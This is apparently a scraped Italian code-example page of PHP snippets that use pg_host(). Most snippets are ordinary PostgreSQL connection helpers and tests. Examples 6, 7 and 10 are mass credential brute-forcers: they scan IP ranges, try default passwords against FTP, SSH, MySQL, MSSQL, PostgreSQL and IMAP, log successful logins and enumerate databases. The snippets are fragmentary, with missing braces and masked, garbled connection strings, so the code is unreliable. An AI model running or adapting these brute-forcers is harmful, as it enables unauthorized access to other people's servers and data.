Esempio n. 1
 public static function castLink($link, array $a, Stub $stub, $isNested)
     $a['status'] = pg_connection_status($link);
     $a['status'] = new ConstStub(PGSQL_CONNECTION_OK === $a['status'] ? 'PGSQL_CONNECTION_OK' : 'PGSQL_CONNECTION_BAD', $a['status']);
     $a['busy'] = pg_connection_busy($link);
     $a['transaction'] = pg_transaction_status($link);
     if (isset(self::$transactionStatus[$a['transaction']])) {
         $a['transaction'] = new ConstStub(self::$transactionStatus[$a['transaction']], $a['transaction']);
     $a['pid'] = pg_get_pid($link);
     $a['last error'] = pg_last_error($link);
     $a['last notice'] = pg_last_notice($link);
     $a['host'] = pg_host($link);
     $a['port'] = pg_port($link);
     $a['dbname'] = pg_dbname($link);
     $a['options'] = pg_options($link);
     $a['version'] = pg_version($link);
     foreach (self::$paramCodes as $v) {
         if (false !== ($s = pg_parameter_status($link, $v))) {
             $a['param'][$v] = $s;
     $a['param']['client_encoding'] = pg_client_encoding($link);
     $a['param'] = new EnumStub($a['param']);
     return $a;
Esempio n. 2
 function disconnect()
     if (!pg_close($this->dbConnection)) {
         return "Failed to close connection to " . pg_host($this->dbConnection) . ": " . pg_last_error($this->dbConnection) . "<br/>\n";
     } else {
         return "Successfully disconnected from database";
Esempio n. 3
 public function connect($dbIP, $dbUser, $dbPass, $dbName, $dbPort = null)
     // check parameters
     if ($dbIP == '') {
         die('<b>ERROR:</b> no database host provided... <b>w2db.php, line ' . __LINE__ . '</b>');
     if ($dbName == '') {
         die('<b>ERROR:</b> no database name provided... <b>w2db.php, line ' . __LINE__ . '</b>');
     if ($dbUser == '') {
         die('<b>ERROR:</b> no database user provided... <b>w2db.php, line ' . __LINE__ . '</b>');
     //if ($dbPass == '') die('no database password provided');
     $this->dbName = $dbName;
     // connect
     if ($this->dbType == 'postgres') {
         $this->dbConn = pg_connect("host={$dbIP} " . ($dbPort != null ? "port={$dbPort} " : "") . "dbname={$dbName} user={$dbUser} password={$dbPass}");
         if (!$this->dbConn) {
             $this->dbConn = null;
             print "<b>ERROR:</b> Cannot connect to postgres.<br>";
             return false;
         $this->dbVersion = pg_version($this->dbConn);
         $this->dbVersion['host'] = pg_host($this->dbConn);
     if ($this->dbType == 'mysql') {
         $this->dbConn = mysql_connect($dbIP . ($dbPort != null ? ":" . $dbPort : ""), $dbUser, $dbPass);
         if (!$this->dbConn) {
             $this->dbConn = null;
             print "<b>ERROR:</b> Cannot connect to mysql.<br>";
             return false;
         $this->dbVersion = array();
         $this->dbVersion['client'] = mysql_get_client_info();
         $this->dbVersion['protocol'] = mysql_get_proto_info($this->dbConn);
         $this->dbVersion['server'] = mysql_get_server_info($this->dbConn);
         $this->dbVersion['host'] = mysql_get_host_info($this->dbConn);
Esempio n. 4
File: db.php Progetto: dapepe/tymio
 public function getConnInfo()
     $item = $this->resultQuery('SHOW SERVER_VERSION');
     return 'PostgreSQL ' . (($host = pg_host($this->db)) === '' ? 'local' : "{$host}:" . pg_port($this->db)) . " ({$item['0']})";
Esempio n. 5
 public function Host()
     return pg_host($this->connection);
Esempio n. 6
function multibruter()
    $users = array('root');
    $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'haslo', 'Password123');
    $imap_users = array('postmaster', 'hostmaster', 'master', 'admin', 'administrator', 'test', 'root', 'demo');
    print "\n Options:\n";
    print "  [1] Grab IP\n";
    print "  [2] Continue\n";
    print "   What: ";
    $check = fopen("php://stdin", "r");
    $czk = fgets($check);
    $czk = trim($czk);
    if ($czk == 1) {
        print "\n URL: ";
        $url = fopen("php://stdin", "r");
        $www = fgets($url);
        $www = trim($www);
        $ip = gethostbyname($www);
        print "\n IP - " . $ip . "\n";
    } elseif ($czk == 2) {
        print "\n First IP: ";
        $fir = fopen("php://stdin", "r");
        $first = fgets($fir);
        $first = trim($first);
        print "\n Last IP: ";
        $sec = fopen("php://stdin", "r");
        $second = fgets($sec);
        $second = trim($second);
        if (ip2long($first) && ip2long($second) !== FALSE) {
            print "\n Options:";
            print "\n  [1] FTP";
            print "\n  [2] SSH";
            print "\n  [3] DB's (PgSQL,MySQL,MsSQL)";
            print "\n  [4] IMAP";
            print "\n  [5] All";
            print "\n   What: ";
            $what = fopen("php://stdin", "r");
            $sup = fgets($what);
            $sup = trim($sup);
            if ($sup == 1 || $sup == 5) {
                print "\nFTP user: "******"php://stdin", "r");
                $ftpuser = fgets($ftp);
                $ftpuser = trim($ftpuser);
            for ($ip = ip2long($first); $ip <= ip2long($second); $ip++) {
                print "\n [+] " . long2ip($ip) . "\n";
                if ($sup == 1 || $sup == 5) {
                    if ($checkftp = @fsockopen(long2ip($ip), 21, $errno, $errstr, 5)) {
                        print "\n - FTP found on port 21\n";
                        $ftpconn = ftp_connect(long2ip($ip));
                        if (ftp_login($ftpconn, 'anonymous', '')) {
                            $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - Anonymous login\n";
                            $handle = fopen('out/multibruter.txt', 'a');
                            fwrite($handle, $text);
                            print "Anonymous login allowed!\n";
                            print " - General info\n";
                            print " Files in directory (" . ftp_pwd($ftpconn) . ") :\n";
                            $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn));
                            foreach ($ftpfiles as $plik) {
                                print $plik . "\n";
                        } else {
                            print " - FTP anonymous login not allowed\n";
                        if ($ftpuser != '') {
                            print "\n Bruteforcing...\n";
                            foreach ($passes as $haslo) {
                                $ftpconn = ftp_connect(long2ip($ip));
                                if (ftp_login($ftpconn, $ftpuser, $haslo)) {
                                    $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - " . $ftpuser . ":" . $haslo . "\n";
                                    $handle = fopen('out/multibruter.txt', 'a');
                                    fwrite($handle, $text);
                                    print "" . $ftpuser . ':' . $haslo . " - Success!\n";
                                    print " - General info\n";
                                    print " Current directory - " . ftp_pwd($ftpconn) . "\n";
                                    print " Files in directory:\n";
                                    $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn));
                                    foreach ($ftpfiles as $plik) {
                                        echo $plik . "\n";
                                } else {
                                    echo $ftpuser . ':' . $haslo . "\n";
                        } else {
                            print "\nFTP user is not defined, wont bruteforce.\n";
                    } else {
                        print "\n - FTP seems not working (21)\n";
                if ($sup == 2 || $sup == 5) {
                    if ($checkssh = fsockopen(long2ip($ip), 22, $errno, $errstr, 5)) {
                        print "\n - SSH found on port 22\n";
                        print "\n Bruteforcing...\n";
                        $sshconn = ssh2_connect(long2ip($ip), 22);
                        foreach ($users as $uzytkownik) {
                            foreach ($passes as $haslo) {
                                if (ssh2_auth_password($sshconn, $uzytkownik, $haslo)) {
                                    print "" . $uzytkownik . ':' . $haslo . " - Success! \n";
                                    $text = date('j/y - G:i') . " - SSH - " . long2ip($ip) . " - " . $uzytkownik . ":" . $haslo . "\n";
                                    $handle = fopen('out/multibruter.txt', 'a');
                                    fwrite($handle, $text);
                                    ssh2_exec($sshconn, 'exit');
                                } else {
                                    print $uzytkownik . ":" . $haslo . "\n";
                    } else {
                        print "\n - SSH seems not working (22)\n";
                if ($sup == 3 || $sup == 5) {
                    if ($checkmssql = fsockopen(long2ip($ip), 1433, $errno, $errstr, 5)) {
                        print "\n - MsSQL found on port 1433\n";
                        print "\n Bruteforcing...\n";
                        $mssqluser = '******';
                        foreach ($passes as $haslo) {
                            $mssqlconn = mssql_connect(long2ip($ip), $mssqluser, $haslo);
                            if ($mssqlconn) {
                                print "" . $mssqluser . ':' . $haslo . " - Success! \n";
                                $text = date('j/y - G:i') . " - MsSQL - " . long2ip($ip) . " - " . $mssqluser . ":" . $haslo . "\n";
                                $handle = fopen('out/multibruter.txt', 'a');
                                fwrite($handle, $text);
                            } else {
                                print $mssqluser . ':' . $haslo . "\n";
                    } else {
                        print "\n - MsSQL seems not working (1433)\n";
                    if (fsockopen(long2ip($ip), 3306, $errno, $errstr, 5)) {
                        print "\n - MySQL found on port 3306. \n";
                        print "\n Bruteforcing...\n";
                        foreach ($users as $uzytkownik) {
                            foreach ($passes as $haslo) {
                                $conn = mysql_connect(long2ip($ip), $uzytkownik, $haslo);
                                if ($conn) {
                                    print "" . $uzytkownik . ':' . $haslo . " - Success! \n";
                                    $text = date('j/y - G:i') . " - MySQL - " . long2ip($ip) . " - " . $mssqluser . ":" . $haslo . "\n";
                                    $handle = fopen('out/multibruter.txt', 'a');
                                    fwrite($handle, $text);
                                    $dbuser = mysql_query("SELECT USER();");
                                    $dbuzer = mysql_fetch_row($dbuser);
                                    $dbdb = mysql_query("SELECT DATABASE();");
                                    $dbd = mysql_fetch_row($dbdb);
                                    print "\nGeneral info\n";
                                    print "MySql version - " . mysql_get_client_info() . "\n";
                                    print "Host info - " . mysql_get_host_info() . "\n";
                                    print "Current user - " . $dbuzer[0] . "\n";
                                    print "\nDatabases\n";
                                    $res = mysql_query("SHOW DATABASES");
                                    while ($row = mysql_fetch_assoc($res)) {
                                        print $row['Database'] . "\n";
                                } else {
                                    print $uzytkownik . ':' . $haslo . "\n";
                    } else {
                        print "\n - MySQL seems not working (3306)\n";
                    $checkpgsql = fsockopen(long2ip($ip), 5432, $errno, $errstr, 5);
                    if ($checkpgsql) {
                        print "\n -  PostgreSQL found on port 5432\n";
                        print "\n Bruteforcing...\n";
                        $pguser = '******';
                        foreach ($passes as $haslo) {
                            $pgconn = pg_connect("host=" . long2ip($ip) . " user="******" password="******"" . $pguser . ':' . $haslo . " - Success! \n";
                                $text = date('j/y - G:i') . " - PgSQL - " . long2ip($ip) . " - " . $pguser . ":" . $haslo . "\n";
                                $handle = fopen('out/multibruter.txt', 'a');
                                fwrite($handle, $text);
                                print "\nGeneral info\n";
                                print "Version - " . pg_version($pgconn) . "\n";
                                print "Host - " . pg_host($pgconn) . "\n";
                            } else {
                                print $pguser . ':' . $haslo . "\n";
                    } else {
                        print "\n - PostgreSQL seems not working (5432)\n";
                if ($sup == 4 || $sup == 5) {
                    if ($checkimap = fsockopen(long2ip($ip), 143, $errno, $errstr, 5)) {
                        print "\n - IMAP found on port 143 \n";
                        print "\n Bruteforcing...\n";
                        foreach ($imap_users as $uzytkownik) {
                            foreach ($passes as $haslo) {
                                $mailbox = imap_open("{" . long2ip($ip) . ":143}", $uzytkownik, $haslo);
                                if ($mailbox) {
                                    print "" . $uzytkownik . ':' . $haslo . " - Success! \n";
                                    $text = date('j/y - G:i') . " - IMAP - " . long2ip($ip) . " - " . $uzytkownik . ":" . $haslo . "\n";
                                    $handle = fopen('out/multibruter.txt', 'a');
                                    fwrite($handle, $text);
                                } else {
                                    print $uzytkownik . ":" . $haslo . "\n";
                    } else {
                        print "\n - IMAP seems not working (143)\n";
        } else {
            print "\nWrong IP adress.\n";
Esempio n. 7
function brute_dbs()
    $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'fuckyou', 'Password123');
    $connf = mysqli_connect(SQL_HOST, SQL_USER, SQL_PWD);
    mysqli_select_db(SQL_DB, $connf);
    if (isset($_POST['shost']) && isset($_POST['spath']) && isset($_POST['suser'])) {
        echo '<div class="post">';
        echo '<h2 class="title"><a href="#">Results</a></h2>';
        echo '<div class="entry">';
        echo '<p class="meta"> Single Database attack &nbsp;&bull;&nbsp; Broken credentials will be stored in database &nbsp;&bull;&nbsp; Using wordlist - ';
        if (isset($_POST['wordlist']) == 1) {
            echo 'yes &nbsp;&bull;&nbsp; ';
        } else {
            echo 'no &nbsp;&bull;&nbsp; ';
        echo 'Target: ';
        if (isset($_POST['smysql'])) {
            echo 'MySQL ';
        if (isset($_POST['smssql'])) {
            echo 'MsSQL ';
        if (isset($_POST['spgsql'])) {
            echo 'PgSQL ';
        } elseif (!isset($_POST['smysql']) && !isset($_POST['smssql']) && !isset($_POST['spgsql'])) {
            echo 'None selected';
            $none = TRUE;
        if ($_POST['wordlist'] == 1) {
            if (file_exists($_POST['spath'])) {
                $pwds = file($_POST['spath']);
            } else {
                echo '<p>File not found... Using default passwords.</p>';
                $pwds = $passes;
        } else {
            $pwds = $passes;
        echo '<br /><h3>&raquo; ' . htmlspecialchars($_POST['shost']) . '</h3>';
        if (isset($_POST['smysql'])) {
            $checksql = fsockopen($_POST['shost'], 3306, $errno, $errstr, 5);
            if ($checksql) {
                echo '<br /><p><b>[+]</b> MySql found on port 3306. Bruteforcing...</p>';
                if ($_POST['suser'] == '') {
                    $uzytkownik = 'root';
                } else {
                    $uzytkownik = $_POST['suser'];
                foreach ($pwds as $haslo) {
                    $conn = mysqli_connect($_POST['shost'], $uzytkownik, $haslo);
                    if ($conn) {
                        echo "<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                        mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($_POST['shost']) . ":3306', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                        $dbuser = mysqli_query($conn, "SELECT USER();");
                        $dbuzer = mysql_fetch_row($dbuser);
                        $dbdb = mysqli_query($conn, "SELECT DATABASE();");
                        $dbd = mysql_fetch_row($dbdb);
                        echo '<b>General info</b><br />';
                        echo 'MySql version - <a href="' . mysql_get_client_info() . '">' . mysql_get_client_info() . '</a><br />';
                        echo 'Host info - ' . mysql_get_host_info() . '<br />';
                        echo 'Current user - ' . $dbuzer[0] . '<br />';
                        echo '<br /><b>Databases</b><br />';
                        $res = mysqli_query($conn, "SHOW DATABASES");
                        while ($row = mysqli_fetch_assoc($res)) {
                            echo $row['Database'] . "<br />";
                    } else {
                        echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
            } else {
                echo '<p><b>[-]</b> MySql seems not working (3306).</p>';
        if (isset($_POST['spgsql'])) {
            $checksql = fsockopen($_POST['shost'], 5432, $errno, $errstr, 5);
            if ($checksql) {
                echo '<br /><p><b>[+]</b> PgSql found on port 5432. Bruteforcing...</p>';
                if ($_POST['suser'] == '') {
                    $uzytkownik = 'postgres';
                } else {
                    $uzytkownik = $_POST['suser'];
                foreach ($pwds as $haslo) {
                    $conn = pg_connect("host=" . $_POST['shost'] . " user="******" password="******"<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                        mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($_POST['shost']) . ":5432', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                        echo '<br /><b>General info</b><br />';
                        echo 'Version - ' . pg_version($conn) . '<br />';
                        echo 'Host - ' . pg_host($conn) . '<br />';
                    } else {
                        echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
            } else {
                echo '<p><b>[-]</b> PgSql seems not working (5432).</p>';
        if (isset($_POST['smssql'])) {
            $checksql = fsockopen($_POST['shost'], 1433, $errno, $errstr, 5);
            if ($checksql) {
                echo '<br /><p><b>[+]</b> MsSql found on port 1433. Bruteforcing...</p>';
                if ($_POST['suser'] == '') {
                    $uzytkownik = 'sa';
                } else {
                    $uzytkownik = $_POST['suser'];
                foreach ($pwds as $haslo) {
                    $conn = mssql_connect($_POST['shost'], $uzytkownik, $haslo);
                    if ($conn) {
                        echo "<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                        mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($_POST['shost']) . ":1433', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                    } else {
                        echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
            } else {
                echo '<p><b>[-]</b> MsSql seems not working (1433).</p>';
        echo '</div></div>';
    if (isset($_POST['mhost']) && isset($_POST['mpath']) && isset($_POST['muser'])) {
        echo '<div class="post">';
        echo '<h2 class="title"><a href="#">Results</a></h2>';
        echo '<div class="entry">';
        echo '<p class="meta"> Massive Database\'s attack &nbsp;&bull;&nbsp; Broken credentials will be stored in database &nbsp;&bull;&nbsp; Using wordlist - ';
        if (isset($_POST['wordlist']) == 2) {
            echo 'yes &nbsp;&bull;&nbsp; ';
        } else {
            echo 'no &nbsp;&bull;&nbsp; ';
        echo 'Target: ';
        if (isset($_POST['mmysql'])) {
            echo 'MySQL ';
        if (isset($_POST['mmssql'])) {
            echo 'MsSQL ';
        if (isset($_POST['mpgsql'])) {
            echo 'PgSQL ';
        } elseif (!isset($_POST['mmysql']) && !isset($_POST['mmssql']) && !isset($_POST['mpgsql'])) {
            echo 'None selected';
            $none = TRUE;
        if ($_POST['wordlist'] == 1) {
            if (file_exists($_POST['spath'])) {
                $pwds = file($_POST['spath']);
            } else {
                echo '<p>File not found... Using default passwords.</p>';
                $pwds = $passes;
        } else {
            $pwds = $passes;
        $ips = explode('-', $_POST['mhost']);
        for ($ip = ip2long($ips[0]); $ip <= ip2long($ips[1]); $ip++) {
            echo '<br /><h3>&raquo; ' . htmlspecialchars(long2ip($ip)) . '</h3>';
            if (isset($_POST['mmysql'])) {
                $checksql = fsockopen(long2ip($ip), 3306, $errno, $errstr, 5);
                if ($checksql) {
                    echo '<br /><p><b>[+]</b> MySql found on port 3306. Bruteforcing...</p>';
                    if ($_POST['muser'] == '') {
                        $uzytkownik = 'root';
                    } else {
                        $uzytkownik = $_POST['muser'];
                    foreach ($pwds as $haslo) {
                        $conn = mysqli_connect(long2ip($ip), $uzytkownik, $haslo);
                        if ($conn) {
                            echo "<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                            mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string(long2ip($ip)) . ":3306', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                            $dbuser = mysqli_query($conn, "SELECT USER();");
                            $dbuzer = mysql_fetch_row($dbuser);
                            $dbdb = mysqli_query($conn, "SELECT DATABASE();");
                            $dbd = mysql_fetch_row($dbdb);
                            echo '<b>General info</b><br />';
                            echo 'MySql version - <a href="' . mysql_get_client_info() . '">' . mysql_get_client_info() . '</a><br />';
                            echo 'Host info - ' . mysql_get_host_info() . '<br />';
                            echo 'Current user - ' . $dbuzer[0] . '<br />';
                            echo '<br /><b>Databases</b><br />';
                            $res = mysqli_query($conn, "SHOW DATABASES");
                            while ($row = mysqli_fetch_assoc($res)) {
                                echo $row['Database'] . "<br />";
                        } else {
                            echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
                } else {
                    echo '<p><b>[-]</b> MySql seems not working (3306).</p>';
            if (isset($_POST['mpgsql'])) {
                $checksql = fsockopen(long2ip($ip), 5432, $errno, $errstr, 5);
                if ($checksql) {
                    echo '<br /><p><b>[+]</b> PgSql found on port 5432. Bruteforcing...</p>';
                    if ($_POST['muser'] == '') {
                        $uzytkownik = 'postgres';
                    } else {
                        $uzytkownik = $_POST['muser'];
                    foreach ($pwds as $haslo) {
                        $conn = pg_connect("host=" . long2ip($ip) . " user="******" password="******"<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                            mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string(long2ip($ip)) . ":5432', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                            echo '<br /><b>General info</b><br />';
                            echo 'Version - ' . pg_version($conn) . '<br />';
                            echo 'Host - ' . pg_host($conn) . '<br />';
                        } else {
                            echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
                } else {
                    echo '<p><b>[-]</b> PgSql seems not working (5432).</p>';
            if (isset($_POST['mmssql'])) {
                $checksql = fsockopen(long2ip($ip), 1433, $errno, $errstr, 5);
                if ($checksql) {
                    echo '<br /><p><b>[+]</b> MsSql found on port 1433. Bruteforcing...</p>';
                    if ($_POST['muser'] == '') {
                        $uzytkownik = 'sa';
                    } else {
                        $uzytkownik = $_POST['muser'];
                    foreach ($pwds as $haslo) {
                        $conn = mssql_connect(long2ip($ip), $uzytkownik, $haslo);
                        if ($conn) {
                            echo "<p><font color=\"#009900\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . " - Success!</font></p>";
                            mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string(long2ip($ip)) . ":1433', '" . mysql_escape_string($uzytkownik) . ":" . mysql_escape_string($haslo) . "')", $connf);
                        } else {
                            echo "<font color=\"#990000\">" . htmlspecialchars($uzytkownik) . ':' . htmlspecialchars($haslo) . "</font><br />";
                } else {
                    echo '<p><b>[-]</b> MsSql seems not working (1433).</p>';
        echo '</div></div>';
Esempio n. 8
 function __get($key)
     switch ($key) {
         case 'affected_rows':
             return $this->affected_rows;
         case 'client_info':
             return $this->client_info;
         case 'client_version':
             return $this->client_version;
         case 'server_info':
             return $this->server_info;
         case 'server_version':
             return $this->server_version;
         case 'host_info':
             return pg_host($this->connection);
         case 'errno':
             return 0;
         case 'error':
             return pg_last_error($this->connection);
         case 'insert_id':
             return $this->insert_id();
             return null;
Esempio n. 9
function cs_sql_version($cs_file)
    global $cs_db;
    $sql_infos = array('data_free' => 0, 'data_size' => 0, 'index_size' => 0, 'tables' => 0, 'names' => array());
    $sql_infos['type'] = 'PostgreSQL (pgsql)';
    $sql_infos['host'] = pg_host($cs_db['con']) or cs_error_sql($cs_file, 'cs_sql_version', cs_sql_error());
    if (function_exists('pg_version')) {
        $pg_infos = pg_version($cs_db['con']) or cs_error_sql($cs_file, 'cs_sql_version', cs_sql_error());
    $sql_infos['encoding'] = pg_client_encoding($cs_db['con']);
    $sql_infos['client'] = isset($pg_infos['client']) ? $pg_infos['client'] : '-';
    $sql_infos['server'] = isset($pg_infos['server_version']) ? $pg_infos['server_version'] : '-';
    if ($sql_infos['server'] == '-') {
        $found = cs_sql_query($cs_file, 'SELECT VERSION()', 1);
        preg_match('=[\\d|.]+=', $found['more'][0]['version'], $matches, PREG_OFFSET_CAPTURE);
        $sql_infos['server'] = isset($matches[0][0]) ? $matches[0][0] : $found['more'][0]['version'];
    return $sql_infos;
Esempio n. 10
            } else {
                echo '<h2><b>&raquo;</b> MySQL seems not working (3306).</h2>';
            // PostgreSQL Testing
            $checkpgsql = fsockopen(long2ip($ip), 5432, $errno, $errstr, 5);
            if ($checkpgsql) {
                echo '<h2><b>&raquo;</b> PostgreSQL found on port 5432. </h2>';
                echo '<br /><p>Bruteforcing...</p>';
                $pguser = '******';
                foreach ($passes as $haslo) {
                    $pgconn = pg_connect("host=" . long2ip($ip) . " user="******" password="******"<font color=\"#00FF00\">" . $pguser . ':' . $haslo . " - Success!</font><br />";
                        echo '<br /><b>General info</b><br />';
                        echo 'Version - ' . pg_version($pgconn) . '<br />';
                        echo 'Host - ' . pg_host($pgconn) . '<br />';
                    } else {
                        echo "<font color=\"#990000\">" . $pguser . ':' . $haslo . "</font><br />";
            } else {
                echo '<h2><b>&raquo;</b> PostgreSQL seems not working (5432).</h2>';
        // Dalej
        echo '</div></div>';
Esempio n. 11
 function get_host_info()
     return $this->db_connect_id ? pg_host($this->db_connect_id) : false;
Esempio n. 12
if (pg_connection_status($db) != PGSQL_CONNECTION_OK) {
    echo "pg_connection_status() error\n";
if (!pg_connection_reset($db)) {
    echo "pg_connection_reset() error\n";
if (pg_connection_busy($db)) {
    echo "pg_connection_busy() error\n";
if (function_exists('pg_transaction_status')) {
    if (pg_transaction_status($db) != PGSQL_TRANSACTION_IDLE) {
        echo "pg_transaction_status() error\n";
if (false === pg_host($db)) {
    echo "pg_host() error\n";
if (!pg_dbname($db)) {
    echo "pg_dbname() error\n";
if (!pg_port($db)) {
    echo "pg_port() error\n";
if (pg_tty($db)) {
    echo "pg_tty() error\n";
if (pg_options($db)) {
    echo "pg_options() error\n";